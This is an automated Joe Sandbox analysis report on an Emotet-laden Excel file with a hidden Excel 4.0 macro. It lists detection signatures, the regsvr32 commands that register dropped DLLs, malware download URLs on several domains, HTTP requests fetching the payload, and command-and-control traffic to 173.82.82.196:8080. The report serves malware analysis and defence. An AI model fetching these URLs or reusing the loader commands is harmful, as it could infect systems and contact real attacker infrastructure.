Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan 2022.20.05_0910.xls

Overview

General Information

Sample Name:Scan 2022.20.05_0910.xls
Analysis ID:632106
MD5:93ba39759e944e0a660cf1a72919ff59
SHA1:0d87f3752893a11174df5d1222215014e59d0fd5
SHA256:72d8274eff2d60af4d452efbfb42abf5ce3ac64ea949772350b3c628c842941a
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1704 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2976 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2188 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2396 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2212 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1800 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2404 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 972 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2472 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.1248680431.0000000000160000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000008.00000002.930405356.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.3e0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              5.2.regsvr32.exe.140000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                7.2.regsvr32.exe.510000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  9.2.regsvr32.exe.140000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    8.2.regsvr32.exe.3c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Scan 2022.20.05_0910.xlsVirustotal: Detection: 44%Perma Link
                      Source: Scan 2022.20.05_0910.xlsReversingLabs: Detection: 36%
                      Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                      Source: http://mcapublicschool.com/Achievements/r4psv/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/qAvira URL Cloud: Label: malware
                      Source: http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/D.Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/bLAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/H.Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/URL Reputation: Label: malware
                      Source: https://173.82.82.196:8080/eAvira URL Cloud: Label: malware
                      Source: https://microlent.com/admin/3/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/vLAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/iAvira URL Cloud: Label: malware
                      Source: https://173.82.82.196/4.Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/nLAvira URL Cloud: Label: malware
                      Source: kuluckaci.comVirustotal: Detection: 7%Perma Link
                      Source: mcapublicschool.comVirustotal: Detection: 8%Perma Link
                      Source: moorworld.comVirustotal: Detection: 5%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllReversingLabs: Detection: 40%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllReversingLabs: Detection: 42%
                      Source: C:\Users\user\uxevr1.ocxReversingLabs: Detection: 65%
                      Source: C:\Users\user\uxevr2.ocxMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\uxevr2.ocxReversingLabs: Detection: 42%
                      Source: C:\Users\user\uxevr3.ocxMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\uxevr3.ocxReversingLabs: Detection: 40%
                      Source: C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)Metadefender: Detection: 34%Perma Link
                      Source: C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)ReversingLabs: Detection: 42%
                      Source: C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)Metadefender: Detection: 28%Perma Link
                      Source: C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)ReversingLabs: Detection: 40%
                      Source: C:\Windows\System32\PlMfP\OpoHHoBHS.dll (copy)ReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 103.195.4.8:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,7_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,9_2_00000001800248B0

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Cmk1Nr[1].dll.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: microlent.com
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.195.4.8:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.195.4.8:443

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Mon, 23 May 2022 07:56:43 GMTLast-Modified: Mon, 23 May 2022 07:56:43 GMTServer: Microsoft-IIS/8.5Set-Cookie: 628b3e3b9c6d7=1653292603; expires=Mon, 23-May-2022 07:57:43 GMT; path=/Content-Disposition: attachment; filename="f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 23 May 2022 07:56:43 GMTContent-Length: 365056Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                      Source: global trafficHTTP traffic detected: GET /admin/3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: microlent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /yarisma/cgi-bin/aIuI4Ukdtl730sP1F/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kuluckaci.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Achievements/r4psv/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mcapublicschool.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 173.82.82.196:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1248830029.0000000000301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme56
                      Source: regsvr32.exe, 00000009.00000002.1248842369.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en~
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/4.
                      Source: regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/nL
                      Source: regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/q
                      Source: regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/vL
                      Source: regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/D.
                      Source: regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/H.
                      Source: regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/bL
                      Source: regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/e
